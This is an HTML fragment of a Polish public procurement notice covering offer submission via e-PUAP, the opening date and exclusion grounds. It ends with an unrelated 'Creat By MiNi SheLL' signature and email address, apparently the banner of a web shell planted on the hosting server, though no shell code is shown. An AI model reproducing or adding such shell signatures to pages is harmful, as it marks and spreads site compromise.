class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę należy przesłać na skrytkę Zamawiającego na portalu e-puap: /5wszkzp/SkrytkaESP</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-09-23 09:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-10-22</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 9.1.	O zamówienie mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu z postępowania w okolicznościach, o których mowa w art. 108 ust. 1 pkt 1-6 ustawy Prawo zamówień publicznych oraz w art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego oraz spełniają (o ile zostały określone) warunki udziału w postępowaniu określone przez Zamawiającego w Ogłoszeniu o zamówieniu i SWZ.

Creat By MiNi SheLL
Email: jattceo@gmail.com